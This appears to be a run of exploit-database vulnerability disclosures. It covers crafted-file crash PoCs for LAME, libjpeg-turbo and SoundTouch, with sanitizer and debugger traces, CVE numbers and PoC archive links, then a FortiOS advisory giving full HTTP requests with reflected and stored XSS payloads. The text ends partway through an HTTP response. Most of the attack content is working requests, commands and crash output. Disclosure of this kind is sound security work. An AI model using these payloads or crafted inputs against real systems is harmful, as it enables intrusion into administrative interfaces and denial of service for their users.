LAME multiple vulnerabilities
================
Author : qflb.wu
===============
Introduction:
=============
Following the great history of GNU naming, LAME originally stood for LAME Ain't an Mp3 Encoder.
LAME is an educational tool to be used for learning about MP3 encoding. The goal of the LAME project is to use the open source model to improve the psychoacoustics, noise shaping and speed of MP3.
Affected version:
=====
3.99.5
Vulnerability Description:
==========================
1.
The fill_buffer_resample function in libmp3lame/util.c in LAME 3.99.5 can cause a denial of service (heap-buffer-overflow and application crash) via a crafted WAV file.
./lame lame_3.99.5_heap_buffer_overflow.wav out
==26618==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c000009f08 at pc 0x5f3a1e bp 0x7ffdfaf74620 sp 0x7ffdfaf74618
READ of size 4 at 0x60c000009f08 thread T0
#0 0x5f3a1d in fill_buffer_resample /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:606
#1 0x5f3a1d in fill_buffer /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:677
#2 0x55257c in lame_encode_buffer_sample_t /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1736
#3 0x55257c in lame_encode_buffer_template /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1891
#4 0x553de1 in lame_encode_buffer_int /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1963
#5 0x488ba9 in lame_encoder_loop /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:462
#6 0x488ba9 in lame_encoder /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:531
#7 0x483c40 in lame_main /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:707
#8 0x48bee1 in c_main /home/a/Downloads/lame-3.99.5/frontend/main.c:470
#9 0x48bee1 in main /home/a/Downloads/lame-3.99.5/frontend/main.c:438
#10 0x7ff8c8771f44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
#11 0x481a6c in _start (/home/a/Downloads/lame-3.99.5/frontend/lame+0x481a6c)
0x60c000009f08 is located 8 bytes to the right of 128-byte region [0x60c000009e80,0x60c000009f00)
allocated by thread T0 here:
#0 0x46ba59 in calloc (/home/a/Downloads/lame-3.99.5/frontend/lame+0x46ba59)
#1 0x5f1302 in fill_buffer_resample /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:561
#2 0x5f1302 in fill_buffer /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:677
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:606 fill_buffer_resample
==26618==ABORTING
POC:
lame_3.99.5_heap_buffer_overflow.wav
CVE:
CVE-2017-9410
2.
The fill_buffer_resample function in libmp3lame/util.c in LAME 3.99.5 can cause a denial of service (invalid memory read and application crash) via a crafted WAV file.
./lame lame_3.99.5_invalid_memory_read_1.wav out
==30841==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000005f24ed sp 0x7ffee94d3050 bp 0x000000000000 T0)
#0 0x5f24ec in fill_buffer_resample /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:608
#1 0x5f24ec in fill_buffer /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:677
#2 0x55257c in lame_encode_buffer_sample_t /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1736
#3 0x55257c in lame_encode_buffer_template /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1891
#4 0x553de1 in lame_encode_buffer_int /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1963
#5 0x488ba9 in lame_encoder_loop /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:462
#6 0x488ba9 in lame_encoder /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:531
#7 0x483c40 in lame_main /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:707
#8 0x48bee1 in c_main /home/a/Downloads/lame-3.99.5/frontend/main.c:470
#9 0x48bee1 in main /home/a/Downloads/lame-3.99.5/frontend/main.c:438
#10 0x7f48b8cacf44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
#11 0x481a6c in _start (/home/a/Downloads/lame-3.99.5/frontend/lame+0x481a6c)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:608 fill_buffer_resample
==30841==ABORTING
POC:
lame_3.99.5_invalid_memory_read_1.wav
CVE:
CVE-2017-9411
3.
The unpack_read_samples function in frontend/get_audio.c in LAME 3.99.5 can cause a denial of service (invalid memory read and application crash) via a crafted WAV file.
./lame lame_3.99.5_invalid_memory_read_2.wav out
(gdb) r
Starting program: lame file out
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
0x080f27b3 in unpack_read_samples (samples_to_read=-146880,
bytes_per_sample=<optimized out>, swap_order=-2088828928,
pcm_in=0xb6303d80, sample_buffer=<optimized out>) at get_audio.c:1204
1204 GA_URS_IFLOOP(1)
(gdb) disassemble 0x080f27b3,0x080f27ff
Dump of assembler code from 0x80f27b3 to 0x80f27ff:
=> 0x080f27b3 <get_audio_common+4051>:mov 0x20000000(%eax),%al
0x080f27b9 <get_audio_common+4057>:test %al,%al
0x080f27bb <get_audio_common+4059>:je 0x80f27d0 <get_audio_common+4080>
0x080f27bd <get_audio_common+4061>:mov $0x8320b78,%edx
0x080f27c2 <get_audio_common+4066>:and $0x7,%edx
0x080f27c5 <get_audio_common+4069>:add $0x3,%edx
0x080f27c8 <get_audio_common+4072>:cmp %al,%dl
0x080f27ca <get_audio_common+4074>:jge 0x80f6715 <get_audio_common+20277>
0x080f27d0 <get_audio_common+4080>:xor $0xf879,%ebx
0x080f27d6 <get_audio_common+4086>:add 0x8320b78,%ebx
0x080f27dc <get_audio_common+4092>:mov %ebx,%eax
0x080f27de <get_audio_common+4094>:shr $0x3,%eax
0x080f27e1 <get_audio_common+4097>:mov 0x20000000(%eax),%al
0x080f27e7 <get_audio_common+4103>:test %al,%al
0x080f27e9 <get_audio_common+4105>:je 0x80f27f8 <get_audio_common+4120>
0x080f27eb <get_audio_common+4107>:mov %ebx,%edx
0x080f27ed <get_audio_common+4109>:and $0x7,%edx
0x080f27f0 <get_audio_common+4112>:cmp %al,%dl
0x080f27f2 <get_audio_common+4114>:jge 0x80f6727 <get_audio_common+20295>
0x080f27f8 <get_audio_common+4120>:incb (%ebx)
0x080f27fa <get_audio_common+4122>:movl $0x7c3c,%gs:(%edi)
End of assembler dump.
(gdb) i r
eax            0x837f0000   -2088828928
ecx            0x2448       9288
edx            0xbfee5e20   -1074897376
ebx            0x7c3c       31804
esp            0xbfee4c20   0xbfee4c20
ebp            0xbfee8278   0xbfee8278
esi            0xfffffcf2   -782
edi            0xfffffffc   -4
eip            0x80f27b3    0x80f27b3 <get_audio_common+4051>
eflags         0x10246      [ PF ZF IF RF ]
cs             0x73         115
ss             0x7b         123
ds             0x7b         123
es             0x7b         123
fs             0x0          0
gs             0x33         51
(gdb) x/20x 0x837f0000
0x837f0000: Cannot access memory at address 0x837f0000
POC:
lame_3.99.5_invalid_memory_read_2.wav
CVE:
CVE-2017-9412
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42390.zip
libjpeg-turbo denial of service vulnerability
======================
Author : qflb.wu
CVE : CVE-2017-9614
======================
Introduction:
=============
libjpeg-turbo is a JPEG image codec that uses SIMD instructions (MMX, SSE2, AVX2, NEON, AltiVec) to accelerate baseline JPEG compression and decompression on x86, x86-64, ARM, and PowerPC systems.
Affected version:
=====
1.5.1
Vulnerability Description:
==========================
The fill_input_buffer function in jdatasrc.c in libjpeg-turbo 1.5.1 can cause a denial of service (invalid address and application crash) via a crafted JPEG file.
I found this bug when testing stills2dv-alpha-0.601, which uses libjpeg-turbo.
./stills2dv exampleworkfile.s2d
(the exampleworkfile.s2d contains the path of the poc jpg file)
----debug info:----
gdb-peda$ bt
#0 __memcpy_sse2 () at ../sysdeps/x86_64/multiarch/../memcpy.S:166
#1 0x00007ffff6d82323 in __GI__IO_file_xsgetn (fp=0x61c370,
data=<optimized out>, n=0x1000) at fileops.c:1387
#2 0x00007ffff6d7786f in __GI__IO_fread (buf=<optimized out>, size=0x1,
count=0x1000, fp=0x61c370) at iofread.c:42
#3 0x00007ffff7b6e23b in fill_input_buffer (cinfo=0x7fffffffe190)
at jdatasrc.c:107
#4 0x00007ffff7b7beef in get_dqt (cinfo=0x7fffffffe190) at jdmarker.c:516
#5 0x00007ffff7b7dba3 in read_markers (cinfo=0x7fffffffe190)
at jdmarker.c:1050
#6 0x00007ffff7b795fd in consume_markers (cinfo=0x7fffffffe190)
at jdinput.c:320
#7 0x00007ffff7b6c853 in jpeg_finish_decompress (cinfo=0x7fffffffe190)
at jdapimin.c:399
#8 0x0000000000402da0 in readjpg (
fn=fn@entry=0x61c2f4 "example_data_files/test.jpg") at s2d_jpg.c:148
#9 0x0000000000403c5b in openImage (
fn=0x61c2f4 "example_data_files/test.jpg", cache=0xffffffff)
at s2d_main.c:202
#10 0x00000000004063a5 in splitted2struct (p=p@entry=0x60acc0 <ms>,
strs=strs@entry=0x61c2a0) at s2d_main.c:1139
#11 0x000000000040240b in main (argc=argc@entry=0x2,
argv=argv@entry=0x7fffffffe5f8) at s2d_main.c:1404
#12 0x00007ffff6d2af45 in __libc_start_main (main=0x402040 <main>, argc=0x2,
argv=0x7fffffffe5f8, init=<optimized out>, fini=<optimized out>,
rtld_fini=<optimized out>, stack_end=0x7fffffffe5e8) at libc-start.c:287
#13 0x0000000000402500 in _start ()
=================================================================================
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x00007ffff7b6e233    107    nbytes = JFREAD(src->infile, src->buffer, INPUT_BUF_SIZE);
gdb-peda$
[----------------------------------registers-----------------------------------]
RAX: 0x61ce30 --> 0x464a1000e0ffd8ff
RBX: 0x7fffffffe190 --> 0x7fffffffe0e0 --> 0x7ffff7b89ce0 (<error_exit>:push rbp)
RCX: 0x61c370 ("example_data_files/test.jpg")
RDX: 0x1000
RSI: 0x1
RDI: 0x61ce30 --> 0x464a1000e0ffd8ff
RBP: 0x7fffffffdff0 --> 0x7fffffffe050 --> 0x7fffffffe070 --> 0x7fffffffe0a0 --> 0x7fffffffe0c0 --> 0x61c370 ("example_data_files/test.jpg")
RSP: 0x7fffffffdfd0 --> 0x7fffffffe030 --> 0x0
RIP: 0x7ffff7b6e236 (<fill_input_buffer+56>
R8 : 0x67706a2e747365 ('est.jpg')
R9 : 0x7ffff70ca7b8 --> 0x623770 --> 0x0
R10: 0x7fffffffde90 --> 0x0
R11: 0x7ffff7b6c74c (<jpeg_finish_decompress>:push rbp)
R12: 0x61c2f4 ("example_data_files/test.jpg")
R13: 0x61c5b0 --> 0x61c370 ("example_data_files/test.jpg")
R14: 0xc00 ('')
R15: 0x3
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x7ffff7b6e229 <fill_input_buffer+43>:mov edx,0x1000
0x7ffff7b6e22e <fill_input_buffer+48>:mov esi,0x1
0x7ffff7b6e233 <fill_input_buffer+53>:mov rdi,rax
=> 0x7ffff7b6e236 <fill_input_buffer+56>:
call 0x7ffff7b477f0 <fread@plt>
0x7ffff7b6e23b <fill_input_buffer+61>:mov QWORD PTR [rbp-0x10],rax
0x7ffff7b6e23f <fill_input_buffer+65>:cmp QWORD PTR [rbp-0x10],0x0
0x7ffff7b6e244 <fill_input_buffer+70>:
jne 0x7ffff7b6e2bb <fill_input_buffer+189>
0x7ffff7b6e246 <fill_input_buffer+72>:mov rax,QWORD PTR [rbp-0x8]
Guessed arguments:
arg[0]: 0x61ce30 --> 0x464a1000e0ffd8ff
arg[1]: 0x1
arg[2]: 0x1000
arg[3]: 0x61c370 ("example_data_files/test.jpg")
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdfd0 --> 0x7fffffffe030 --> 0x0
0008| 0x7fffffffdfd8 --> 0x7fffffffe190 --> 0x7fffffffe0e0 --> 0x7ffff7b89ce0 (<error_exit>:push rbp)
0016| 0x7fffffffdfe0 --> 0x5bffffe0bc
0024| 0x7fffffffdfe8 --> 0x61c880 --> 0x61d028 --> 0x0
0032| 0x7fffffffdff0 --> 0x7fffffffe050 --> 0x7fffffffe070 --> 0x7fffffffe0a0 --> 0x7fffffffe0c0 --> 0x61c370 ("example_data_files/test.jpg")
0040| 0x7fffffffdff8 --> 0x7ffff7b7beef (<get_dqt+71>:test eax,eax)
0048| 0x7fffffffe000 --> 0x0
0056| 0x7fffffffe008 --> 0x7fffffffe190 --> 0x7fffffffe0e0 --> 0x7ffff7b89ce0 (<error_exit>:push rbp)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x00007ffff7b6e236    107    nbytes = JFREAD(src->infile, src->buffer, INPUT_BUF_SIZE);
gdb-peda$ x/20x $rdi
0x61ce30:    0x464a1000e0ffd8ff    0x1c00020101004649
0x61ce40:    0x4300dbff00001c00    0x28191e231e1c2800
0x61ce50:    0x3c30282b2d232123    0x587b3c37373c4164
0x61ce60:    0x8f9699809164495d    0xa0c3e6b4a08a8c80
0x61ce70:    0xcbffc88c8aaddaaa    0xc19bfffffff5eeda
0x61ce80:    0xfffde6fffaffffff    0x2d2b014300dbfff8
0x61ce90:    0x764141763c353c2d    0xf8f8f8f8a58ca5f8
0x61cea0:    0xf8f8f8f8f8f8f8f8    0xf8f8f8f8f8f8f8f8
0x61ceb0:    0xf8f8f8f8f8f8f8f8    0xf8f8f8f8f8f8f8f8
0x61cec0:    0xf8f8f8f8f8f8f8f8    0xc0fff8f8f8f8f8f8
gdb-peda$ ni
Program received signal SIGSEGV, Segmentation fault.
POC:
test.jpg;exampleworkfile.s2d
CVE:
CVE-2017-9614
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42391.zip
SoundTouch multiple vulnerabilities
================
Author : qflb.wu
===============
Introduction:
=============
SoundTouch is an open-source audio processing library for changing the Tempo, Pitch and Playback Rates of audio streams or audio files. The library additionally supports estimating stable beats-per-minute rates for audio tracks.
Affected version:
=====
1.9.2
Vulnerability Description:
==========================
1.
The TDStretch::processSamples function in source/SoundTouch/TDStretch.cpp in SoundTouch 1.9.2 can cause a denial of service (infinite loop and CPU consumption) via a crafted WAV file.
./soundstretch SoundTouch_1.9.2_infinite_loop.wav out
POC:
SoundTouch_1.9.2_infinite_loop.wav
CVE:
CVE-2017-9258
2.
The TDStretch::acceptNewOverlapLength function in source/SoundTouch/TDStretch.cpp in SoundTouch 1.9.2 can cause a denial of service (memory allocation error and application crash) via a crafted WAV file.
./soundstretch SoundTouch_1.9.2_memory_allocation_error.wav out
==87485==ERROR: AddressSanitizer failed to allocate 0x16103e000 (5922611200) bytes of LargeMmapAllocator: 12
==87485==AddressSanitizer CHECK failed: /build/buildd/llvm-toolchain-3.4-3.4/projects/compiler-rt/lib/sanitizer_common/sanitizer_posix.cc:68 "(("unable to mmap" && 0)) != (0)" (0x0, 0x0)
#0 0x46da6f in __asan::AsanCheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x46da6f)
#1 0x4732d1 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x4732d1)
#2 0x477b9e in __sanitizer::MmapOrDie(unsigned long, char const*) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x477b9e)
#3 0x433278 in __sanitizer::LargeMmapAllocator<__asan::AsanMapUnmapCallback>::Allocate(__sanitizer::AllocatorStats*, unsigned long, unsigned long) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x433278)
#4 0x42f2bb in __asan::Allocate(unsigned long, unsigned long, __sanitizer::StackTrace*, __asan::AllocType, bool) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x42f2bb)
#5 0x46824d in operator new[](unsigned long) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x46824d)
#6 0x7fdf6e993d8e in soundtouch::TDStretch::acceptNewOverlapLength(int) /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:724
#7 0x7fdf6e993d8e in soundtouch::TDStretch::calculateOverlapLength(int) /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:1008
#8 0x7fdf6e9901f0 in soundtouch::TDStretch::setParameters(int, int, int, int) /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:158
#9 0x7fdf6e998910 in soundtouch::TDStretch::setChannels(int) /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:599
#10 0x47f825 in setup(soundtouch::SoundTouch*, WavInFile const*, RunParameters const*) /home/a/Downloads/soundtouch/source/SoundStretch/main.cpp:127
#11 0x47f825 in main /home/a/Downloads/soundtouch/source/SoundStretch/main.cpp:310
#12 0x7fdf6d777f44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
#13 0x47dbac in _start (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x47dbac)
POC:
SoundTouch_1.9.2_infinite_loop.wav
CVE:
CVE-2017-9259
3.
The TDStretchSSE::calcCrossCorr function in source/SoundTouch/sse_optimized.cpp in SoundTouch 1.9.2 can cause a denial of service (heap-buffer-overflow and application crash) via a crafted WAV file.
./soundstretch SoundTouch_1.9.2_heap_buffer_overflow.wav out
==87598==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x625000007110 at pc 0x7f5076e3c3dc bp 0x7ffda7a42e10 sp 0x7ffda7a42e08
READ of size 16 at 0x625000007110 thread T0
#0 0x7f5076e3c3db in soundtouch::TDStretchSSE::calcCrossCorr(float const*, float const*, double&) /home/a/Downloads/soundtouch/source/SoundTouch/sse_optimized.cpp:120:35
#1 0x7f5076e1f0f9 in soundtouch::TDStretch::seekBestOverlapPositionFull(float const*) /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:305
#2 0x7f5076e1ee2c in soundtouch::TDStretch::seekBestOverlapPosition(float const*) /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:258
#3 0x7f5076e21e88 in soundtouch::TDStretch::processSamples() /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:659
#4 0x7f5076e12893 in soundtouch::FIFOSamplePipe::moveSamples(soundtouch::FIFOSamplePipe&) /home/a/Downloads/soundtouch/source/SoundTouch/../../include/FIFOSamplePipe.h:88
#5 0x7f5076e12893 in soundtouch::SoundTouch::putSamples(float const*, unsigned int) /home/a/Downloads/soundtouch/source/SoundTouch/SoundTouch.cpp:334
#6 0x480f5e in process(soundtouch::SoundTouch*, WavInFile*, WavOutFile*) /home/a/Downloads/soundtouch/source/SoundStretch/main.cpp:200
#7 0x480f5e in main /home/a/Downloads/soundtouch/source/SoundStretch/main.cpp:314
#8 0x7f5075c00f44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
#9 0x47dbac in _start (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x47dbac)
0x625000007110 is located 0 bytes to the right of 8208-byte region [0x625000005100,0x625000007110)
allocated by thread T0 here:
#0 0x468209 in operator new[](unsigned long) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x468209)
#1 0x7f5076e055db in soundtouch::FIFOSampleBuffer::ensureCapacity(unsigned int) /home/a/Downloads/soundtouch/source/SoundTouch/FIFOSampleBuffer.cpp:174
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/soundtouch/source/SoundTouch/sse_optimized.cpp:120 soundtouch::TDStretchSSE::calcCrossCorr(float const*, float const*, double&)
==87598==ABORTING
POC:
SoundTouch_1.9.2_heap_buffer_overflow.wav
CVE:
CVE-2017-9260
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42389.zip
# Title: FortiOS <= 5.6.0 Multiple XSS Vulnerabilities
# Vendor: Fortinet (www.fortinet.com)
# CVE: CVE-2017-3131, CVE-2017-3132, CVE-2017-3133
# Date: 28.07.2016
# Author: Patryk Bogdan (@patryk_bogdan)
Affected FortiNet products:
* CVE-2017-3131 : FortiOS versions 5.4.0 to 5.6.0
* CVE-2017-3132 : FortiOS versions up to 5.6.0
* CVE-2017-3133 : FortiOS versions up to 5.6.0
Fix:
Upgrade to FortiOS version 5.6.1
Video PoC (add admin):
https://youtu.be/fcpLStCD61Q
Vendor advisory:
https://fortiguard.com/psirt/FG-IR-17-104
Vulns:
1. XSS in WEB UI - Applications:
URL:
https://192.168.1.99/ng/fortiview/app/15832" onmouseover=alert('XSS') x="y
Http request:
GET /ng/fortiview/app/15832%22%20onmouseover=alert('XSS')%20x=%22y HTTP/1.1
Host: 192.168.1.99
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Cookie: APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AZxzmYv40KrD1JvCdcctTzmuS+OEd08y+4Vh54tq%2Fap2ej%2F1gJfbaindJ5r4wDXZh%0A4q%2FfgVCdTfMFn+Mr6Xj5Og%3D%3D%0A%26AuthHash%3D9+TbiFXbk+Qkks0pPlkbNDx2L1EA%0A"; ccsrftoken_573485771="5424C6B3842788A23E3413307F1DFFC5"; ccsrftoken="5424C6B3842788A23E3413307F1DFFC5"; VDOM_573485771=root; csrftoken_573485771=da85e919f71a610c45aff174b23c7a10
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Http response:
HTTP/1.1 200 OK
Date: Thu, 23 Mar 2017 12:07:47 GMT
Server: xxxxxxxx-xxxxx
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Vary: Accept-Encoding
Content-Length: 6150
Connection: close
Content-Type: text/html; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-UA-Compatible: IE=Edge
(...)
<span class="fgd-app tooltip id_15832" onmouseover="alert('XSS')" x="y " data-address="undefined" data-dport="443" data-protocol="6"><a href="https://www.fortiguard.com/fos/15832" onclick="return false;" data-hasqtip="2"><span class="app_icon app15832" onmouseover="alert('XSS')" x="y"></span><label class="app_label" title="">15832" onmouseover=alert('XSS') x="y</label></a></span>
(...)
2. XSS in WEB UI - Assign Token:
URL:
https://192.168.1.99/p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3Cscript%3E
Http request:
GET /p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E%3Cscript%3E HTTP/1.1
Host: 192.168.1.99
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Cookie: APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0ALuXSfDjrp0Gel8F8TeKlBgC3kk4P1mhdELHr2Cicb3Zb6hBUnT9ZZnjXC44Dc7bD%0Ae2ymJG%2FgbHFa+4N9AVDIrg%3D%3D%0A%26AuthHash%3DMyJMLA32ueruHIEKia2eb9BWi8oA%0A"; ccsrftoken_573485771="314A25687F6B2075F9413405575D477"; ccsrftoken="314A25687F6B2075F9413405575D477"; VDOM_573485771=root; csrftoken_573485771=593eb7ed5cb9704ffa4f388febbd5160
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Http response:
HTTP/1.1 200 OK
Date: Thu, 23 Mar 2017 13:39:17 GMT
Server: xxxxxxxx-xxxxx
Content-Security-Policy: frame-ancestors 'self'
Expires: Thu, 23 Mar 2017 13:39:17 GMT
Vary: Cookie,Accept-Encoding
Last-Modified: Thu, 23 Mar 2017 13:39:17 GMT
X-UA-Compatible: IE=Edge
Cache-Control: max-age=0
X-FRAME-OPTIONS: SAMEORIGIN
Set-Cookie: csrftoken_573485771=593eb7ed5cb9704ffa4f388febbd5160; expires=Thu, 22-Mar-2018 13:39:17 GMT; Max-Age=31449600; Path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 3485
(...)
<script type="text/javascript">
var ftokens = [];
var action = '</script><script>alert('XSS')</script><script>';
</script>
</head>
(...)
3. Stored XSS in WEB UI - Replacement Messages:
#1 - Http request:
POST /p/system/replacemsg/edit/sslvpn/sslvpn-login/ HTTP/1.1
Host: 192.168.1.99
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Referer: https://192.168.1.99/p/system/replacemsg/edit/sslvpn/sslvpn-login/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRFTOKEN: d58f666c794024295cece8c5b8b6a3ff
X-Requested-With: XMLHttpRequest
Content-Length: 125
Cookie: guest_user_group_21232f297a57a5a743894a0e4a801fc3=; APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AYLFfh9FU2cKvm+hvxa8SbqbuwSnhEdeYV7CatzaScTAAOryJNdjQjDTLke8gJLfS%0A8Zx7lNyNxQr6xJIaKg5lpA%3D%3D%0A%26AuthHash%3D5NI4JPbIioX2ZJvxtEOGAOJ7q5UA%0A"; ccsrftoken_573485771="592068D7C2B5BDB7A91833DB6A512C14"; ccsrftoken="592068D7C2B5BDB7A91833DB6A512C14"; VDOM_573485771=root; csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D
DNT: 1
Connection: close
csrfmiddlewaretoken=d58f666c794024295cece8c5b8b6a3ff&buffer=ABC%3C%2Ftextarea%3E%0A%3Cscript%3Ealert('XSS')%3C%2Fscript%3E%0A
#1 - Http response:
HTTP/1.1 302 FOUND
Date: Thu, 23 Mar 2017 15:36:33 GMT
Server: xxxxxxxx-xxxxx
Content-Security-Policy: frame-ancestors 'self'
Expires: Thu, 23 Mar 2017 15:36:33 GMT
Last-Modified: Thu, 23 Mar 2017 15:36:33 GMT
Cache-Control: max-age=0
X-FRAME-OPTIONS: SAMEORIGIN
X-UA-Compatible: IE=Edge
Set-Cookie: EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%2C%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D; Path=/
Location: https://192.168.1.99/p/system/replacemsg-group/edit/None/sslvpn/sslvpn-login/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 0
#2 - Http request:
GET /p/system/replacemsg-group/edit/None/sslvpn/sslvpn-login/ HTTP/1.1
Host: 192.168.1.99
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Referer: https://192.168.1.99/p/system/replacemsg/edit/sslvpn/sslvpn-login/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRFTOKEN: d58f666c794024295cece8c5b8b6a3ff
X-Requested-With: XMLHttpRequest
Cookie: guest_user_group_21232f297a57a5a743894a0e4a801fc3=; APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AYLFfh9FU2cKvm+hvxa8SbqbuwSnhEdeYV7CatzaScTAAOryJNdjQjDTLke8gJLfS%0A8Zx7lNyNxQr6xJIaKg5lpA%3D%3D%0A%26AuthHash%3D5NI4JPbIioX2ZJvxtEOGAOJ7q5UA%0A"; ccsrftoken_573485771="592068D7C2B5BDB7A91833DB6A512C14"; ccsrftoken="592068D7C2B5BDB7A91833DB6A512C14"; VDOM_573485771=root; csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%2C%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D
DNT: 1
Connection: close
#2 - Http response:
HTTP/1.1 200 OK
Date: Thu, 23 Mar 2017 15:36:33 GMT
Server: xxxxxxxx-xxxxx
Content-Security-Policy: frame-ancestors 'self'
